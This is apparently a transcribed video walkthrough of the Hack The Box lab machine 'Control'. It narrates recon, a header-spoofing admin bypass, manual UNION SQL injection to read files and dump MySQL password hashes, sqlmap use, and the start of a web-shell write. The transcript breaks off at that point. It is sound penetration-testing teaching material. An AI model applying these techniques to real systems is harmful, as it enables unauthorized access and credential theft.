Okay, so now we're going to move into control, right? In this box, you're going to actually learn step by step everything from SQL injection, how it works manually. You're going to learn PowerShell 7. You're going to learn commandlets. You're going to learn, the details of hacking, and we're even going to, at the very end, we're going to look at the logs that are created in this attack. Once we compromise the box and we pop it, you're going to actually see what would have been logged by a SIM like Splunk or ArcSight or an Elk stack like Kibana. So it's going to be very, very, very insightful to anyone that's wanting to get into penetration testing, red teaming, and you're going to learn the entire flow from start to finish. So this is going to be really fun. Let's just go ahead and just create the directory. So sudo, let's go ahead and create a directory called control, and then we're going to cd into control. This just means if this side is true, if the left side is true, then the right side should be operated upon. So we're just basically joining both of these commands together. See, now we're in control. All right. So we've got nothing in here. Let's start up tmux. All right, so we're going to go ahead and name this tab Control A, comma, name it VPN, and then sudo open VPN, and we're just basically pointing the config to our VPN file. All right, so we are connected to the VPN, right? So Control A C, Control A comma, recon, and let's just do a target. Let's just save the IP address as a variable named target. And then what we can do is we can do sudo ping -c. I want to count 4 pings. If you leave this off, it'll just ping forever. And then target, meaning we'll put the IP address in place of the variable name. We just want to make sure the target's active. Now, of course, a target can be active even if it doesn't respond to ping. But this is just one good test you can do. And of course, if the TTL is less than 128 but greater than 64, it's most likely a Windows box. So this is a pro tip because you can discover the operating system of a target machine just by pinging it in many cases. So keep that in mind. Let's go ahead and run nmap against it. Let me explain what's happening here. So we're running nmap with root privileges because then we get more data. Verbose means that as nmap discovers open ports, it will display them. We won't have to wait until nmap finishes before we see the results. We'll see the results as they're being discovered. -pn means don't bother pinging it, just assume it's active. -t5 is the most aggressive scan. T3 is usually what we would use in a real engagement because T5, if the box is weak, you might just knock it over from inundating it with so many packets. But since this is hack the box and it's a live environment, T5 should be okay. -sc means run default scripts. Don't run any scripts that are going to run live exploits against the box. Again, nmap is kind of like Nessus or like a typical vulnerability scanner. There's scripts that can run checks and in some cases attacks on the target. So you want to make sure that you don't run any scripts that can potentially knock the box offline or cause it to reboot. And then the -s and then V means do the version checks. So what I did was I actually just concatenated 2 different flags together in one flag. And this is really cool because nmap has the ability to identify a service that's running on a non-standard port, right? So if you have, for example, FTP running on port 25, nmap is smart enough to know that you're not running SMTP because it runs a series of checks against that port to do everything it can to ascertain what service really resides on that port. And it's kind of detailed how it does it, but it really does do it. I've done some testing here and it's really amazing how nmap works. -on means you want the config file to be, you want the output to be stored in the nmap file, which is just a file that saves the output. This -P0655535 means you want to scan all ports from port 0 to 65535. A lot of times people will put in -P- like this, and that scans ports 1 to 65535, but it misses port 0. So putting in that this full port range gets port 0 as well, because sometimes it will show up. So that's another pro tip that you can use. And then finally, you want the reason to be displayed if the port's blocked, and then finally the target which is a variable for the IP address. Here we go, we're off to the races. And while Nmap is scanning, you can always press the spacebar key to get an update about its progress. All right, so as this scans, let's just go ahead and investigate, because we can see that RPC is listening. This is MySQL, and this is port 80. Since port 80 typically has the broadest attack surface, we should start with the web. And I'm not even sure what this port is. So we'll create a new pane, Control A, C, Control A, comma, discovery. And let's just open up a browser. And let's open up burp as well, so we can passively spy the host as we poke around the page. So I'm going to go ahead and select burp from here. All right, sweet. So let's look at the options. Control-Shift-P, options. And I just want to make sure that the server responses are also intercepted. Let's go back to intercept, and let's take intercept off. This is just going to filter all the traffic through burp so I can build out this target tab. We can build out a sitemap while we browse. So the page is loaded, and we can just, scroll through it. The title's fidelity, I don't know what that means. It says the future has landed. Who knows what that means? We could try putting SQL injection, testing this for SQL injection by putting a single tick. But you see it just takes us to the top of the page. You can actually tell that by this anchor tag. All these links down here look like they don't really go anywhere. We don't have a copyright date. Sometimes you can find, if there's a copyright date down here that's in the past, then you can search for exploits against this. But we could see, is this running WordPress or something similar? There's also an admin page in the login portal. So if we press Control U, we get the source. Control F, let's just search for cred or key or pass or salt. We can look for comments. So right away we see this comment here. Looks like the developer left a to-do list inside of the source code that basically says, we need to import products and we need to link to a new payment system. And it gives us an internal IP, which is interesting, right? So this would be a finding, right? So what we actually would do is we do control, I think it's control print screen, or is it control shift print screen? Yeah, control shift print screen. And then you would grab this and put it in a report to the client. But yeah, so that's really interesting. We could keep looking for other comments. We could also look for JavaScript. And we can go through all of these if we wanted to. But let's look what burp found. So we've already got some stuff here. Here's a sitemap. And you can see there's some JavaScript files. There's some CSS. And there's a bunch of other things. So what I like to do is I like to right click and say add to scope. And then click inside of here and say show only in scope items. That way, if I'm browsing Google or Facebook or whatever else I'm browsing, that's not going to filter into this sitemap. I'm only going to see what's relevant to this particular target. In addition, if you look in the bottom right here, you can see that this is powered by PHP 737. And it looks like it's running IIS 10. Now, IIS 10 can either be Windows 10, Windows 2016, or Windows 2019. We don't know. But it's running PHP on Windows, which is interesting because most Windows applications are running, you would expect, something other than PHP. One of the things that's really interesting about this target already, I can tell you, is that it's running MySQL. So if we go back here, let's go back to Nmap, Control A1. But it's running MySQL, not Microsoft SQL Server. So this is an interesting stack, security stack, an interesting configuration, and we're probably going to find some interesting things through this engagement. So let's go back to the page. Let's just go to admin. And it gives us an interesting message. It says access denied, header missing. Please ensure you go through the proxy to access this page. So it almost appears that this web application is implementing access control via a custom HTTP header, which currently isn't present, and therefore I wasn't granted access to this admin page. So if we knew what that header combination was, we might be able to gain access to this. Now, before we figure this out, let's go ahead and have something running in the background. So we've already got Nmap running in the background. It's still running. I can press spacebar to check on it. Looks like it's almost 60% done, but we can run some discovery. So Control A2. Let's run dir search. Control A, shift, double quote, Control A, hold down Control, press down. And then in this bottom pane, we can type sudo opt dir search. And I'm going to explain everything that happens here. So we're starting with dir search. Where did I get dir search? I just Googled, right? So you can go to Google. And first, let me take off burp. Dir search GitHub. This right here, right? And then you can just go git clone, copy, and then all I did was I just went into the opt directory and then ran git clone. So literally all I did was I went here, I went cd opt, and then I did sudo git clone, and then put in the GitHub repository path and dot to basically save it there. Once you do that, you have it. Control U to delete it. And let's go back up and get the help file. Control A, left bracket, page up, and down a little bit. So now we can investigate what we can do with this awesome tool. So what we're doing first is we want a URL, right? The target. So technically what we could do here is we could control left. I can just put in HTTP target. Actually, that won't work because the variable is session specific. And so if I go up here, press page down. If I say echo target, nothing happens, right? That's because it was saved in the previous pane, this one, which now Nmap is finished. If I do echo here, target, you'll see it. So what we could do is we could just go down here, we could save it, but we don't need to. Let's just put in the address. So we're saying scan this target. Capital, yeah, that's a new word. Capital E means that we want to do a search for common extensions, right? Use a predefined list of common extensions. We know there's PHP, but there may be others. Technically, we could just do a -e space PHP, but we're just going to include some common extensions so we can have a little bit more verbose of a scan. Let's run 50 threads. I usually start with 50. Sometimes if you put too many threads against a vulnerable web server or a web server that's under-resourced, it could just crash or reboot. That's not what you want. So we'll just keep the thread count relatively low. And then the other thing I like to do is I like to put random user agents in the scan. Sometimes if the target is running some kind of web application firewall or something similar, if it sees the scan is coming from a non-browser, in other words, the user agent string shows dir search, then it might just block the scan activity, the recon activity. So here we're just going to use a bunch of random user agents as it's scanning, and then we're going to output the report to this file called dirsearch.html, and then we're just going to use this word list, which is a common word list that's included with Kali. Okay, hopefully that makes sense. So I'm just going to go ahead and make sure I'm in the bottom pane by pressing Control A down arrow and then pressing enter, entering the password, and let's go. I'm going to go up. I'm just going to exit this top pane. All right, so now we've got some recon going on in the background, and Nmap is finished. If we do cat control.nmap, we should see the file. So already we can see a couple of things, right? One, port 80, we already knew that was running. Microsoft IIS. And here's some scripts that ran. It determined that these methods are supported. This is nothing big. I see this a lot. It's just showing that, these are the methods that are supported. Trace can potentially be a vulnerability, but it isn't in this case. And this is just the server name. Fidelity is the title of the web page, which we saw when we went back to this page here. See in the title bar. And 135, this is Microsoft Windows RPC, Remote Procedure Call. This is a legacy port that's usually open on all Windows boxes. Very small attack surface. 3306 is MySQL, and you can see here it actually tried to connect, but it wasn't allowed to connect. For example, if I do this, MySQL, and I do H, and I put 10.10.10.167. Look at that. You see the error message I got? It's not allowed to connect to this MariaDB server. MariaDB, by the way, is another name for MySQL. You can see that same error message up here. So it literally just tried to do what we did, and it got the same message back. Then we have a few high-level ports, and that's really it. Okay? And if you go back to Discovery, you can see this is still running. So let's go back to the web page and look at this custom header. Admin. Maybe we can Google some custom headers, right? So if we go to Google, let's type, what should we Google? Well, we can say like header proxy, maybe HTTP header proxy. Let's try that. HTTP header proxy. Click the first link and see what we've got. Let's just type everything for, oops. Not sure what I did there. Control F, I'm just going to search for proxy and just go down the list to find something. Proxies, yeah, here we go. So here's some headers that we can add to a word list. And the idea here is I want to try to fuzz these fields to see if I can find a header that will grant me access to this admin portal. So Control AC, Control A, comma, fuzz. And we'll create a new file, sudo vim headers.txt. I, Control Shift V. Interesting. Control Shift V. There we go. Escape. GG to go to the top. DD to delete. Down arrow. DD. Delete line. Down arrow. DD. Delete line. Down arrow. DD. Delete line. And so on. Escape. Shift ZZ to save the file. Cat headers just to make sure it's there, and it is. Now we're going to use wfuzz to fuzz some fields here. So again, I like to split the panes, Control A, Shift, double quote, Control A, hold down Control while I press the down arrow. I like to use the bottom pane to build out my command and the top pane to look at the help file. I find that this is very useful in running these tools. All right, so what are we doing here? Sudo wfuzz. I just pressed the right arrow key to autocomplete this. So let me explain what's happening here. First, we have -C. -C is for colors. I like colors. Verbose. That's what the -V is. Okay? -T, again, you probably can guess this. What do you think -T stands for? If you said threads, you are awesome. Number of current connections. 10 is default. We're doing 50. Then we need a word list. Actually, we need the URL. So I've got the URL in here as well, right here. And we're fuzzing specifically this endpoint, this admin.php file, or the admin.php endpoint, because that's where we saw that message. Control W to close this. That's where we saw this. And what else do we need? We need the header. So -H. If you look in the help, you'll see that the header it looks like it's this format. So we can put fuzz anywhere we want to replace a name with something from our word list. Right, so I want to fuzz this value. And so we can go back down here. We can type fuzz and we'll just put 127.0.0.1. And you'll see what's happening in a moment. Watch what happens when I press enter. Control AZ. So you can see here we're actually getting a 200 response for everything. What's going on? We need to probably filter this to a proxy so we can investigate. Control A left bracket / proxy. And if we do -P, we can put a proxy in this format and view it. If we go to burp, Control-Shift-P, you can see we're listening on localhost 8080. So let's do a -P, 127.0.0.1. That's the IP. Then we have a port, 8080, and then we have a type, HTTP, right? Go back to burp, Control-Shift-P, intercept, make sure this is on, and then press enter. All right, so if you notice, you could see here's wfuzz, and here's the header that came from our headers file, right? That was the first one on the list. Do Control-A, Shift double quote, cat headers.txt, Control-AZ to make it big. Well, it looks like forwarded was not the first one on the list, X forwarded host. So it's doing this one right now. And then we do forward, it's doing X forwarded 4. And then we go forward again, and it's doing forwarded. So I'm guessing the next one's going to be via. Okay, well it's not, but it is another header inside of our list, X forwarded proto. And this is probably going to be via. So it looks like it's randomly selecting it. But the point here is that it's working. I mean, it's sending the requests in, but we're getting 200s for everything. I'm not seeing the response for some reason. Oh, I am seeing the response. Okay, there's a response. Okay, so let's go back over here and let's think about this. Let's see. Let's take off this proxy bit and let's also fuzz the IP address. So we could put in, well, let's just put in the IP address of the server, 10.10.10.167. Enter. Same problem, 200s. Control-AZ, let's get back out. Control-A, up. So if we go back to the source code in this web app, let's go back. Control-U. You'll see it has this IP in the 192.168.4 network. So what we probably want to do is we want to iterate. Well, we could use this IP here as the IP in the header, or we could create a Python script or a bash script or something and just sort of print out all the hosts in the 4.0 subnet and see if we can just test all of those against all the combinations of HTTP request headers and see which one gives us a different result than what we're seeing in wfuzz, right? So let me show you what I mean. So first, let's see if we can use Python to do this. Let's create a new tab, Control-A, C, Control-A, comma, dev, call it dev, Python 3. So if we say like, let's see, from netadr, import IP network, and we can say for IP in IP network, 192.168.0.40/24 colon tab print IP. Now before we press enter, just to let you know, we're importing this IP network module from this particular library, and then we're saying every time you loop, we're going to create a loop, and we're going to loop through each host in the 192.168.4.0 network. So this is a 24-bit mask, so it's actually 255.255.255.0, right? So it's going to go 192.168.4.1. It's going to print that out. That's going to be the IP the first time through. Second time through, it's going to be 192.168.4.2, right? Print that out, and so on and so forth until you get to 255. So if this works, and it does, we have what we need. So let's go ahead and create a script. Before we do that, we want to make sure we use the right version of Python, the location. You'll see why I'm doing this in a second. Sudo vim, let's call it ips.txt. Oh, I'm sorry. What am I doing? That is not what we're doing here. What we're doing here is we're creating a sudo ips.py. Vim ips.py. All right, so I'm going to do a shebang at the top, Control-Shift-V, and that just tells the bash shell that what we're executing is a Python script. So we can say from net ADR import IP network for IP in IP network 192.168.0.4.0, sorry, colon, and then we can just do print IP escape shift ZZ sudo chmod plus X, make it executable. And if we do ls minus lahr on IPs, we should see that it is now executable by everyone, right? Anyone can run it. Anyone in the root group can run it, and root himself can run it. So if we just did like, let's see, we did this, it runs, right? So let's just grab this whole thing, space, page up, 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 page down, right? Let's go right here, and we're going to press enter, sudo vim ips.txt, I, Control A, right bracket, escape, shift ZZ, cat ips.txt to make sure it's there, ips.txt, and it's there. Sweet. So we can now go back to the fuzz tab and continue to build our query. Now what we're going to do, in addition to the headers, remember what we're doing, shift %. If you do cat headers, right arrow to complete. We're now going to also do these IPs, right? So let's close this out. We can say a second word list, and we're going to put in ips.txt. And instead of having this 10.10.10.167 static IP, we're going to do a second one, fuzz2z. Now, how did I know to do that? Because if I go up here, Control A, left bracket, page up, page up, page up, you'll see this, fuzz in2. In is a variable for a number. Wherever you put these keywords, wfuzz will replace them with the values of the specified payload. So we're putting these keywords here. So the first word list goes in this place, and the second word list for IPs will go in this place, right? Make sense? So press enter, and that looks a lot better. But it's still a lot of data, so we probably want to filter out anything that's 89 characters. Let's go up, let's look down here to see how to do that. And it looks like if we do a dash tac tac HH and then a number for the number of characters, it will filter those out. Okay, let's go back here and we do a tac tac HH 89. That looks a lot better. Now we see there's one particular header and IP combination that gets us a different response. It's still 200 code, but we're getting 466 words back, or almost 8,000 characters back. Let's copy this and let's put this into burp and see if we can figure out what is going on. Control W, let's close that out. Let's close this out. And let's make sure we are putting the traffic through burp. And let's see, let's go to burp. Drop this, intercept is on. Let's go to admin. We grabbed it, and let's go ahead and put this new field in here. Now, if you noticed, this 8 is way out here, so I'm going to drag it back in, and I'm going to change this single dash to a colon, and then I'm going to hit this little new line button so that we can see that each header has their appropriate ending at the end. /r/n is a new line character for Windows, which is what we want. All right, so that looks good. Let's go ahead and forward it. We got a response back. And so far it looks good. Let's go ahead and turn intercept off and see if it forwards us through, yes, to the back end. So this is really cool. We see products, we see a way to create products, we see categories. You know, again, we can Control U, look at the source code here, look at anything that looks interesting to us, any comments, any scripts. There's some hidden fields here, right? Sometimes you can find credentials and things like that in hidden fields. But we're going to notice if we try to do anything, like for example, test for SQL injection with a single tick, it's going to say the header's missing. Now, how do you think we can fix this? Think about it for a moment. What we want to do is, all the traffic's going through Burp. So, if we can rewrite each request to include that header, we might be able to get around it. So if we go to options, go down to match and replace, and we're just going to go to add, and this is what it says: type, request header, match, regex condition to match, leave blank to add a new header. Yep, that's what we want to do. We want to add a new header, so we will leave this field blank. And then literal string to replace, leave blank to remove a matched header. No, we want a real string to add. So we're going to just copy and paste that in. I'm going to clean this up. And then I'm going to say, first I'm going to copy that to the clipboard in case I need it later. I'm going to say admin portal bypass via custom HTTP header. Okay. Scroll in here, and you see it's selected. All right, so now the requests are being rewritten, and if we go back to the web page, we should see the page loads just fine. Let's see, back. Yep, so everything's working right, and we also see a SQL injection. This is error-based SQL injection, clearly. It's saying you have an error in the SQL syntax. So let's play with this. We're going to do some manual SQL injection, and I'm going to show you something really, really cool here. You're finally going to understand this. If you've always wondered how SQL injection works, now you'll know. Let's go back to Burp, and let's look at our history. Just go down to the bottom. Let's see, do we have this request? Yes, we do. So let's do Control R, Control Shift R to send it to repeater, and then let's do Control Space to send it through. What I'm going to do is I'm first going to look at this error message, and it's saying that the header is missing. So for some reason it didn't actually add the header, the request header here. So let's go ahead and add that in. Let's try to send it again. Control Space again, and now it went through. And we should see this error, right? So let's make it automatically scroll to that part of the response. If I type in error, it matches. And if I go to settings, I can actually say auto scroll to match when text changes, right? So now I can change this to a single tick, which is %27. And you see that, right? But if I change it to a P, which is a valid product name, you don't get an error message. Sweet, sweet. And how did I know to use P? Well, if we go back here, let's go back. See, P, it's a product name. We could have used any of these products, but I used P because it's the easiest to type. So let's experiment. We've got SQL injection here. How can we really test this? What can we do with this? Well, the first thing I like to do whenever I have SQL injection is I need to determine how many columns we have in the database. Right? That's really important for a lot of the attacks that we're going to do. So let's go ahead and start by ordering. Now, actually, what I'm going to do first is I'm going to go to W3 Schools and show you how this works. So forget SQL injection. This is just regular SQL, right? Sort the result set in ascending or descending order. So we have this database, customers table, and we do an order by this. Look what happens. Try for yourself, right? Click Run SQL. You can see it's ordering by the country right here. And if we look, these are different columns, right? 1, 2, 3, 4, 5, 6, 7. So one way to identify a column is through its index, which is the number of the column. So if I say order by 7, I should get the same result. Yep, same thing. If I say order by 6, I should order by the postal code. It does, right? Now if I say order by 10, I should get an error message because I don't have 10 columns. So do you see how this was, this is actually a pretty good way to identify how many columns you have in the database. So let's go back to Burp, see if we can do that. Order by, let's say you might say, oh, let's just do this, right? It's not going to quite work because our syntax is not correct. we need to do is we are injecting into a string somewhere. So we're injecting right here into some query that we don't yet have access to. And there's probably some stuff that comes after this somewhere. So we need to comment that out. And the way to do that in MySQL is through using a tack, double tack, right? That's how you can actually comment stuff out. In here, you see it actually completed now, because now it's saying column not found, unknown column 10. Well, what if I change this to 5? Control Shift. And to make it automatically zoom down, let's see here. Well, we don't get the error message, so that's good. So that means there's probably definitely 5 columns. Let's do 6. Control space. I'm not seeing that either, so let's do 7. Control space. Error message. Unknown column 7. So we know there's 6 columns. Now that we know there's 6 columns, we can use a union injection to append one query into the next. So unions, I love this site, W3 Schools. Let's look at union. If I go to, let's see, union. Here we go. You can actually join 2 result sets into one result set, right? So let's see here. So we've got this customer table, and we've got the suppliers table. And if we do a union, it'll join them. Let me show you. Try it yourself. So first, let's just take this out so you can see what it looks like without any fancy SQL going on. That just selects all the cities from customers, right? Control Z. And if we change this to suppliers, take this out, run SQL, we get all the suppliers. The city from the suppliers. This is the column we're selecting. So we'll do Control Z. Now if we do both and attach it with a union, we will actually get both result sets returned in a single result, which is what we're seeing here. Now, in order for this to work, the number of columns has to match between both select statements on both sides of the union, and the data type has to match as well. Another good explanation for this is on Portswigger's website, Portswigger SQL Union. This used to really confuse me, but this stuff really makes a lot of sense if you think about it. See, determine the number of columns. See, first we're ordering by the index of the column. And we keep incrementing until we get an error message, and we're just commenting out everything that follows it. There's another way to do it this way. I use the order by because it's less likely to be caught by detection tools like web application firewalls, WAFs, and things like that. And then once you find out how many columns you want to see what the data type is. So here we're just searching through each column type until we find, we're just trying to see if we can insert a string in each of these columns, because that's what we're going to use as our injection point. Let's go back here. Let's just do this, right? Union, select 1, 2, 3, 4, 5, 6. Control Shift. And we shouldn't get an error message or anything. Right, so far everything looks good. So let's go ahead and put in this first field, let's just put a user. Call the user function and see what happens. We got a user. So let's scroll down to this every time. What I'm going to do is I'm going to search for TD to TD. And what I'm doing is, in the HTML, I'm telling it to match on this particular string. So every time we do our as we're building our SQL injection query, we can immediately see the results without having to scroll down the response. All right, so that's a user. We see that this database is running as the manager at localhost. You can probably look at the database too. Yep, we're in the warehouse database. Let's see what else we can do. We can probably look at the version. Yep, MariaDB. So now, the next thing we probably want to do is exfil some files, right? Because we have this injection point, and we can use this to see what files we can grab. So we know this is a Windows server, and let's see if we can pull something out of here. Let's do a load file. Tick tick. And this is a Windows box, so it's probably going to be in the C drive. And I'm just guessing where it's going to be. Let's see, inet pub, maybe www root. Let's just try index.php. Right now we have 2,355 bytes. Control space. That number changed. So it's possible that the behavior of this page changed in some way. But I don't see a file, right? I don't see anything exfilled. We could try converting this to base 64. To base 64. Control space. And we're now getting an error message. And it says function warehouse to base 64 does not exist. So this function doesn't exist. Maybe I did this wrong. Maybe it's to underscore base 64. Control space. Yes. So now we've got this value that we can decode. All right, so you understand what happened here? So I'm going to go ahead and copy this. We are loading this file from the local file system of the victim machine. This happens to be the default web root for IIS. And then we're passing it to base 64 so that we can exfil the data. We can then go to decoder, Control V to paste, and then we can say decode as base 64. And now we've got this file. Now, easier way to do this and to read through this is just to put it in V. So let's go here, sudo vim, let's do index.php.b64. I, Control Shift V, escape, Shift ZZ, cat. Okay, it's there. So now we can do sudo base64 index. Let's see what we got here. Anything interesting? Well, this is the source code that we saw, right? So nothing really different than what we've already seen. But remember, there was an admin.php, right? Let's try to grab that file. Let's go back to repeater. Change this to admin. Control space. Yeah, now we're cooking with gas. Let's grab this. Right click. Copy, Alt Tab, sudo vim admin.b64. And let's see, I Control Shift V, escape Shift ZZ, sudo b64. Let's do admin.b64. All right, let's just actually look at that. We can't. Let's see, hold on. Because I want to look at it in Vim because it has a syntax highlighting and things like that. So let's see here. First of all, my OCD is getting mad because these formats don't follow. So let me go ahead and change that. Sudo move admin to admin.php.b64. Okay. And then what we can do is sudo base64 -d, and then we will output that to admin.php. Okay, so permission denied. Let's do this as root sudo -i cd opt cd home pentester control, and then we can do base 64 -d and output that to admin.php. Now it's there. And if we exit that and go back to a pentester account, we should now be able to look at this in Vim. So let's go up here, exit, and let's take a look at what's going on here. Oops. Here we go. Let's go to the top. Something's not right here. Looks like it clipped off the top of this. So let's try it again. Shift:/Q bang. Here we go. All right. So it's saying this IP 192.168.4.28 is an array. It's a single value of this array, and we're going to store it in a variable named allowed. And then it's saying if the X forwarded for header is not set, then take the remote address, in other words, the address that's connecting to the server, and store it in this server array called HTTP origin. So that's just some housekeeping there. But this is the real bread and butter. This part right here, it's saying if allowed is in this array. So if the IP that the user is connecting from is in this X forwarded for header that's being sent in, then this if condition is true, and you notice there's nothing here, so it should just skip over the else and go directly to loading the admin page. Otherwise, the header isn't there, and so we get this error message, which we've seen already, right? We've already seen this. So let's go ahead and scroll down this page and see if there's anything else that's interesting here. This is the actual SQL injection point. So you can see it says select star from products, order by name, extending limit 5. So we are injecting in this name parameter right here. And when we put that single tick is closing out this single tick. And then we put the P and tac tac, that part comments out this entire section right here. It's hard for me to highlight this, but if I can go back to burp, let's see. Yeah, so this P tac, that P tac there is here, and the tac there closes out this tac here. And then going back to this injection point, this dash dash space dash comments out everything else out here. ASC space limit space 5, right? And then we're just putting all this data in its place. This is all going in this name field. So there's no parameterization, there's no sanitization. You're literally just passing this raw name, which is unsanitized. It's very unsafe. And it's being passed into this product array. And then it's being essentially, it's printing out the raw values of this array into the source code of the web application. So this is why the SQL injection works. Later, we're actually going to look in the logs, and I'm going to show you what it looks like. You're going to be surprised because you're not going to see it. I'll tell you what I mean in a moment. So that's interesting. But we also notice there's a database.php file here. So we should try to get that because database files usually have credentials. So let's go ahead and exit this. So let's update this to database, control space, and we've got some more goodness. Got that on the clipboard, and let's take a look at it. Escape, Shift ZZ, and then we'll do base 64 decode, and we'll send that out to database.php. Sweet. Colon set number. I just like having the numbers there. So got the database name, got the username, and we've got clear text creds. Very, very nice. So we should add this to our list. So Control A, Shift %, sudo vim, let's call creds.txt. Let's put in this manager, and we see the password here. Let's see. It's having some problems selecting this. If I press YY, Control A, right, escape, capital P, it didn't do what I wanted. U to undo. I'll just type it in. YY is yank. It's supposed to copy it to the clipboard, and then capital P is supposed to paste it. And then I like to put where we found it. So discovered put it on above it. Discovered via SQL injection, data exfiltration. SQL injection chained to local file include, data leading to data exfiltration. Okay. Cat creds. Nice. All right, so let's exit this. We've got some creds. Click on the gas. All right, so let's see what else we can do here. Let's take a look at the MySQL schemata. Control W, Control L, Google, MySQL information schema. Sweet. So there should be a schemata. Schemata table, yes. So schemata table provides information about databases. Name of the schema. Let's see, what do we want to get out of here? We probably want the name of the schema, right? So we can say select. Let's first redo this query. Let's change it up. Actually, what we can do, let's rename this. Double click in here. We'll call this SQLi to LFI. Let's rebuild this query. Take out load file, and then I'll take out toBase. Let's go back here. Information schema schemata. Select. What are we selecting? Schema name. So this is the column. So select schema name. Schema name from information schema.schemata. Control space. Let's see if that works. Let's see, we've got some kind of syntax error here. Schema name from information schema.schemata. Let's just copy and paste. I find that sometimes works better. Control Shift, Control V. Let's grab this. Control V. And we'll just put a dot here. And we're still seeing error in SQL syntax. Let's see. Could try putting this like this. Nope, that just makes it a literal string. Try putting these in parentheses. Control space. Let's try another select. Here we go. So you notice I had to put this one. It used to be this, right? And if I press Control Z, if I press Control Z, you'll see what I did is I put the whole thing in parentheses, and then I just ran a sub-select statement inside of the parentheses. And when I did that, I get an error message about cardinality. Now, before we go deeper, I just realized I forgot to do something. And we'll address this error in a second. What I want to do is I want to copy this. Control copy. Now I'm going to go all the way back to we did our data exfil. I believe this is it. Control space. Then I want to go to number 2. Control V. Control space. Schemata. So now we have these different tabs for each different thing, right? SQLi to LFI, and then schemata right there. It just makes it a lot easier to stay organized when you have these tabs specified by purpose in repeater. And then let's put this error back in and make sure it's still set to auto scroll to match. All right. So this cardinality What this basically is saying is that we're returning more than one row. So we need to concatenate the results into one row. If we go here, we can say group concat, aggregate functions, group concat. This function returns a string result of the concatenated non-null values from a group. Right, so that's what we want to do. We want to run this group concat on a single column. So if we go, let's see, group concat, control space. Now we've got everything here, but it's still a little difficult to read because of these commas are putting on one line. I would like to separate by a new line. So if we go back here, you can see that there is a separator, which you can add here, right? Just at the end of the group concat inside the parentheses. So let's go ahead and do that. We can say separator. Let's try a new line. Control Shift. And that worked. Right, so now we've got everything on its line, and we see that there's a MySQL database. So let's try to connect to that, because the MySQL database should have a user column. Yeah, see, there's a user and there's a password column inside of this table. So we can use SQL injection. We should be able to use SQL injection to get these two columns, these two fields out of this table, user and password. So let's say, let's see what we can do here. So instead of selecting the schema name, we want to do a user and password. So user, password from MySQL.user, right? That's the table, MySQL.user. Control space, syntax error. Let's see what we did wrong. Probably need a comma here. That was it. So now we can see the hashes of all these accounts. So I bet if we search this hash, we'll see that it matches the hash we've already captured for the manager, which is in creds, right? This. So if we first, what we can do is we can do sudo hash ID, Control Shift V, just to make sure that this is a SHA-1 hash, and it is. So if we go to hashkiller, hashkiller.io, we can pop it in and see if it's been cracked before. So hashcracker, SHA-1, Control V, paste, submit. Yes, let me in. You see it, right? So let's go to search again. Let's go back to burp. And if we grab this one, we can see if this has been cracked. Control V, paste, submit, and it has. So now we've got more creds. Let's tidy this up a bit. The username is Hector. Now we got this discovered via SQLi from MySQL.user table. Now, one thing we could do is run SQL map on this, just so you can see, what this would do. So if we do, because I wanted you to see the manual method, now we can also see the automated method. Control A, Shift double quote, Control A, hold down Control. We can actually save everything in a file. So if we go back to here, we can grab this, right click, copy. Now, by the way, we could say right click, copy to file, but if I do it this way, it's probably not going to work because burp is not running as root. Oh, it did work. I was surprised. Let's go here and let's see if we have it now. Cat rec.sql. Where did it save that file? Right click, copy to file, rec.sql, save. Yeah, it's not here. So that's okay. Sudo vim rec.sql. We'll make it Control AZ, I, Control Shift V. What we will do here is we will clean up this input here, because SQL injection via SQL map, they don't want the request to have the attack string present. So I just removed everything up to this, and I'm going to say escape shift ZZ cat request.sql. That looks good. Now when I run SQL map, it should be better. If we go up here, control page up, we can see a couple things here, right? So we obviously want to do batch. Never ask user input, use the default behavior. I'm actually not seeing everything here, so we could, I think if we do a tac help like this, it gives us more verbose help. Oh, show advanced help. Tac HH. Yeah, this is super advanced here. So we want to do a request file, load request from a file. We want to do batch. And we could specify user agents strings. I'm actually not going to use random agents because I want you guys to see in the logs later when we compromise this host. I want you to see what it looked like. And what else do we want to do? So we can set the level. The default is 1. We want to set this to 5. And we want to set the risk to 3. Of course, this is a real engagement. We wouldn't put the highest risk in level because you might, again, flatten the box. But because this is hack the box and it's a virtual machine in a safe environment, it's okay to do that here. And then what do we want to do? We just want to take a look at what we can do. Let's just dump everything, right? All right, so that's running. Wow, that is absolutely amazing. You see it's grabbing everything from this database. It's basically doing an automated, basically it's automating what we did manually. It already cracked one of the passwords, which we already knew, but it's cool to see that it grabbed it. See, it's storing everything in a CSV file here. So we're going to take a look at that once this finishes. All right, so let's grab this. Let's actually just go to this folder. Of course we can't, so we need to first turn into root. Go into MySQL, see a bunch of things, including user.csv. So we could open this if we do LibreOffice. And yep, everything looks good here. Let's just go ahead and open it. Finish. Okay. And you can see pretty much what we saw through the manual methods, right? We've got the passwords, we've got the usernames. Well, these are the hashes. But we cracked these hashes and we found out what we needed. And you can see this one is cracked here. Looks like SQL Map wasn't able to crack Hector, but we did crack it by going to HashKiller and finding it that way. So, there's always some value in using automated tools, but now at least you know how it works. You can actually see, if we scroll up in this output, you can see a couple of the tables that it discovered, right? Some of the tables. So that is kind of interesting. Yeah. So there we go. Now what can we do? Well, let's see if we can write a file. Let's see if we can write a shell. So let's duplicate this. I wish there was a way to duplicate tabs. So I'm going to have to copy this here. And we'll name this tab our shell upload. So target, go ahead and put the IP in, port 80. We'll name this web shell. Okay, what else do we need? Let's grab this, Control C, Control V, and then Control Space, just to make sure we're still getting what we want there. All right, and I'm going to put my search so that we get to where we want to go. Auto scroll, sweet. So how can we write a file? Well, there's a couple ways. We can use load, we can dump into. That is a MySQL command. Select into dump file. Here it is. Yeah, so if you do select into out file, this is a common way of writing into MariaDB or MySQL. And this one since it's so common, it's easier to detect. This one, Alt-2, is less common. And so we can actually use this syntax to try to write some arbitrary commands to the web server. So let's copy that. Let's go back to Burp and see how we can craft this query. So this is how I like to do it. I like to paste it into the bottom. We're just going to simplify this query by getting rid of everything inside here. And just putting a 1. Control space. Let's just make sure it still works. Right, it's not working because of this. Let's get rid of this right here. Right, so that still works, right? You see the one there? If I put foo, Control space, foo. So that's our insertion point. So what do we want to put there? Well, it says select into dump file in a file path, right? All right, and what do we want to write? So first let's grab this right here, Control X. This comes at the end of the query, so we'll put it right between the 6 and the end of the query right here. And this out file path is probably going to be something on a C drive. If we go here, we can see this is the path, right? So just copy that. Let's go back here and put this in. And we'll just name it php info.php. Or let's name it something kind of discrete, update.php, right? And then we have the select in this. Well, what are we dumping into this file? Depends on what we put here, right? So let's go ahead and put some PHP code to put in PHP info. Let's see if that works. Control space. And it says I got a general error. If I try to send it again, now it 